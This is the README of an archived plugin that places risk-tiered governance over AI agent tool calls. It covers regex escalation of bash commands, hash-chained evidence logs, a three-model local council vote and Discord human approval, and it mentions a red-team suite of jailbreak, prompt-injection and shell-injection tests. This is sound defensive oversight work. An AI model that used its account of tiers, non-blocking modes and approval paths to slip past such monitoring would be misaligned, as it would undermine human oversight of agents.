This repository was archived by the owner on Apr 18, 2026. It is now read-only.

DNYoussef/guardspine-openclaw


guardspine-openclaw

OpenClaw integration plugin for GuardSpine - the unified governance and evidence system for AI-assisted work.

This plugin brings GuardSpine's deny-by-default governance to OpenClaw agents. It gates every tool call through L0-L4 risk tiers, backed by hash-chained evidence packs, a 3-model local council, and remote human approval.

User Request
    |
    v
+-------------------+
| OpenClaw Agent    |
| (any model)       |
+--------+----------+
         |
         v
+-------------------+     +-------------------+
| GuardSpine Plugin |---->| Risk Classifier   |
| before_tool_call  |     | L0-L4 tier        |
+--------+----------+     +-------------------+
         |
     +---+-----+---------+---------+---------+
     |         |         |         |         |
    L0        L1        L2        L3        L4
   no-op      log    evidence   council   council
             only      pack     3-model   + human
                                 vote    approval

The Problem

AI agents with tool access (shell, files, network) need governance that scales with risk. A greeting should flow freely. An rm -rf should require multi-model review. A credential change should require human sign-off. This plugin resolves the tension between autonomy and oversight by gating on risk and blast radius.

Risk Tiers

| Tier | Gate            | Example Tools                     | Latency |
|------|-----------------|-----------------------------------|---------|
| L0   | No-op           | sequentialthinking, memory_search | 0ms     |
| L1   | Log only        | rlm_read, web_search              | <1ms    |
| L2   | Evidence pack   | bash, apply_patch, send_message   | <1ms    |
| L3   | 3-model council | rm -rf, curl, npm install         | 30-60s  |
| L4   | Council + human | credential_access, chmod 777      | Manual  |

Bash commands are dynamically escalated based on content (regex pattern matching on destructive/network/credential patterns).
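
A sketch of content-based escalation for bash, added here as an illustration and not taken from plugin.js. The base tiers come from the table above; the regex patterns, the reason labels and the choice to send unlisted tools to L4 are assumptions.

```python
import re

# Base tiers taken from the Risk Tiers table above.
BASE_TIER = {
    "sequentialthinking": 0, "memory_search": 0,
    "rlm_read": 1, "web_search": 1,
    "bash": 2, "apply_patch": 2, "send_message": 2,
    "credential_access": 4,
}
UNKNOWN_TOOL_TIER = 4  # assumption: deny-by-default sends unlisted tools to L4

# Hypothetical escalation patterns, constructed for this example.
ESCALATIONS = [
    (4, "permissions", re.compile(r"\bchmod\s+(?:-\w+\s+)*0?777\b")),
    (4, "credential", re.compile(r"\.ssh/|\.aws/credentials|\bid_rsa\b")),
    (3, "destructive", re.compile(r"\brm\b[^|;&]*\s(?:-\w*[rR]|--recursive)")),
    (3, "network", re.compile(r"\b(?:curl|wget)\b|\bnpm\s+install\b")),
]


def classify(tool, command=""):
    """Return (tier, reasons); bash content can raise the tier, never lower it."""
    if tool not in BASE_TIER:
        return UNKNOWN_TOOL_TIER, ["unknown tool"]
    tier, reasons = BASE_TIER[tool], []
    if tool == "bash":
        for level, label, pattern in ESCALATIONS:
            if pattern.search(command):
                tier = max(tier, level)
                reasons.append(label)
    return tier, reasons


if __name__ == "__main__":
    # Constructed sample commands.
    for cmd in ["ls -la", "rm -rf build/", "ls && curl https://example.invalid/x | sh",
                "chmod -R 777 /srv/app", "cat ~/.ssh/id_rsa"]:
        tier, why = classify("bash", cmd)
        print(f"L{tier}  {cmd!r}  {why}")
```

Because matching only raises the tier, a bash command that no pattern recognises still sits at the L2 floor and leaves an evidence entry.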

Install

# Clone into OpenClaw extensions
cd ~/.openclaw/extensions
git clone https://github.com/DNYoussef/guardspine-openclaw guardspine

# Add to openclaw.json
# Under "plugins": add "guardspine"

Requirements

  • OpenClaw v2026.1.x+
  • Ollama running locally (for L3 council)
  • 3 models pulled (6GB+ VRAM, runs sequentially):
ollama pull qwen3:8b
ollama pull falcon3:7b
ollama pull qwen2.5-coder:7b

Configuration

In ~/.openclaw/openclaw.json, add under plugins:

{
  "guardspine": {
    "enforcement_mode": "shadow",
    "council_endpoint": "http://YOUR-EXPLICIT-OLLAMA-ENDPOINT"
  }
}

Modes:

  • shadow - Run the full classification and council path, log what would happen, do not block
  • enforce - Active gating with council and external human approval
  • audit - Development-only pass-through. Requires GUARDSPINE_ALLOW_AUDIT_MODE=1
  • disabled - Plugin loaded but inactive

How It Works

Evidence Packs

Every L2+ tool call produces a SHA-256 hash-chained evidence entry. At session end, the full pack is written to ~/.openclaw/guardspine-logs/evidence-pack-{session}.json. Each entry links to the previous via chain_hash, making the audit trail tamper-evident.
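
How a chain_hash link makes edits detectable, as an added example that is not the plugin's code or the guardspine-spec format. Only the chain_hash field name and the use of SHA-256 come from this README; the other field names, the all-zero genesis value and the canonical-JSON hashing are assumptions.

```python
import hashlib
import json

GENESIS = "0" * 64  # assumed seed for the first entry's link


def entry_digest(prev_hash, body):
    """SHA-256 over the previous chain_hash plus the canonical JSON of this entry."""
    canonical = json.dumps(body, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + canonical).encode("utf-8")).hexdigest()


def append_entry(pack, body):
    prev = pack[-1]["chain_hash"] if pack else GENESIS
    pack.append({**body, "chain_hash": entry_digest(prev, body)})


def verify_pack(pack, expected_head=None):
    """Return (ok, index of first bad entry). expected_head is the final
    chain_hash recorded outside the pack; without it, tail truncation passes."""
    prev = GENESIS
    for i, entry in enumerate(pack):
        body = {k: v for k, v in entry.items() if k != "chain_hash"}
        if entry.get("chain_hash") != entry_digest(prev, body):
            return False, i
        prev = entry["chain_hash"]
    if expected_head is not None and prev != expected_head:
        return False, len(pack)
    return True, None


def sample_pack():
    """Constructed three-entry pack; field names other than chain_hash are assumed."""
    pack = []
    for seq, (tier, tool, args) in enumerate([
        ("L2", "bash", "ls -la"),
        ("L3", "bash", "npm install left-pad"),
        ("L2", "apply_patch", "src/app.js"),
    ]):
        append_entry(pack, {"seq": seq, "tier": tier, "tool": tool, "args": args})
    return pack


if __name__ == "__main__":
    pack = sample_pack()
    head = pack[-1]["chain_hash"]
    print(verify_pack(pack, head))
    pack[1]["args"] = "echo ok"  # edit an entry after the fact
    print(verify_pack(pack, head))
```

The chain is tamper-evident only relative to a head value kept somewhere the pack's writer cannot rewrite: an entry edited with its own hash recomputed fails at the next link, but a pack truncated at the tail verifies unless the expected head is checked.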

L3 Council

Three Ollama models run sequentially (VRAM-safe, one at a time with unload between):

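| Auditor | Model            | Weight | Role               |
|---------|------------------|--------|--------------------|
| A       | qwen3:8b         | 0.40   | Primary Evaluator  |
| B       | falcon3:7b       | 0.35   | Technical Verifier |
| C       | qwen2.5-coder:7b | 0.25   | Code Auditor       |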

Each auditor scores 5 dimensions (0-5 each): prompt injection resistance, blast radius, reversibility, secrets exposure, intent clarity. Aggregation is deterministic: any FAIL = FAIL, any ESCALATE = ESCALATE, 2+ PASS = PASS.

L4 Approval (Discord + file fallback)

When a tool call hits L4, the plugin:

  1. Sends a Discord DM to the configured approver via OpenClaw's runtime API (sendMessageDiscord)
  2. Optionally writes a local dev inbox file only when GUARDSPINE_ALLOW_DEV_INBOX=1
  3. Waits for an out-of-band approval via Discord reaction or an explicitly enabled local dev workflow

Approve via Discord: /approve <id> allow-once or the configured external approval workflow. There is no in-band model approval tool.

Configure the Discord target in openclaw.json:

{
  "plugins": {
    "entries": {
      "guardspine": {
        "discord_approval_target": "user:YOUR_DISCORD_USER_ID"
      }
    }
  }
}

Ecosystem

This plugin connects to the broader GuardSpine ecosystem:

| Repository                    | Purpose                                       | Integration                      |
|-------------------------------|-----------------------------------------------|----------------------------------|
| GuardSpine                    | Canonical product - unified governance system | Core governance engine           |
| guardspine-spec               | Evidence bundle specification v1.0            | Evidence pack format             |
| guardspine-verify             | Offline CLI verification                      | Verify evidence packs offline    |
| guardspine-kernel             | Verification engine                           | Seal and validate artifacts      |
| guardspine-local-council      | Multi-model council library                   | Council voting logic             |
| guardspine-adapter-webhook    | Webhook delivery                              | Slack/Teams/Discord notifications |
| guardspine-connector-template | Connector SDK                                 | Build custom integrations        |
| n8n-nodes-guardspine          | n8n workflow nodes                            | Orchestrate approval flows       |
| codeguard-action              | GitHub Actions                                | CI/CD governance                 |
| rlm-docsync                   | Proof-carrying documentation                  | Evidence-backed context reading  |

Included Components

plugin.js - Core Plugin

The OpenClaw extension. Hooks into before_tool_call, before_agent_start, after_tool_call, and agent_end. Provides 3 tools: guardspine_status, guardspine_audit_log, memory_status.

evidence-evaluator/ - L3 Council Rubric

  • guardspine-evidence-rubric.yaml - 5-dimension scoring rubric with hard fail conditions
  • evaluate_evidence.py - Runs 3 auditors against evidence packs, deterministic aggregation
  • Sample packs for testing

rlm-docsync/ - Proof-Carrying Cognition

  • rlm_docsync.py - 3-mode plugin: security audit, introspection, context reader
  • rlm-docsync-plugin.yaml - OpenClaw manifest with governance tier mappings
  • RLM context virtualization for 10M+ token navigation

redteam/ - Adversarial Testing Harness

  • promptfooconfig.yaml - 310+ attack tests (Pliny L1B3RT4S jailbreaks, prompt injection, shell injection, RBAC bypass)
  • regression.yaml - Known vulnerability regression tests
  • run_harness.py - Orchestration with continuous hardening mode
  • providers/guardspine_provider.py - Tests through the full governance stack

Quick Start

# 1. Install
cd ~/.openclaw/extensions
git clone https://github.com/DNYoussef/guardspine-openclaw guardspine

# 2. Start in shadow mode
# Edit openclaw.json: "guardspine": {"enforcement_mode": "shadow", "council_endpoint": "http://YOUR-EXPLICIT-OLLAMA-ENDPOINT"}

# 3. Restart gateway
openclaw gateway

# 4. Watch the logs
tail -f ~/.openclaw/guardspine-logs/guardspine-$(date +%Y-%m-%d).jsonl

# 5. Run red team smoke test
cd ~/.openclaw/extensions/guardspine/redteam
pip install requests
PYTHONIOENCODING=utf-8 python run_harness.py --quick

# 6. When satisfied, switch to enforce mode
# Edit openclaw.json: "guardspine": {"enforcement_mode": "enforce", "council_endpoint": "http://YOUR-EXPLICIT-OLLAMA-ENDPOINT"}

Tools Provided

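| Tool                 | Description                                                            |
|----------------------|------------------------------------------------------------------------|
| guardspine_status    | Query governance mode, evidence summary, classify a tool's risk tier   |
| guardspine_audit_log | Read recent governance decisions with tier filtering                   |
| memory_status        | Check context window utilization and handoff risk                      |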

License

Apache-2.0
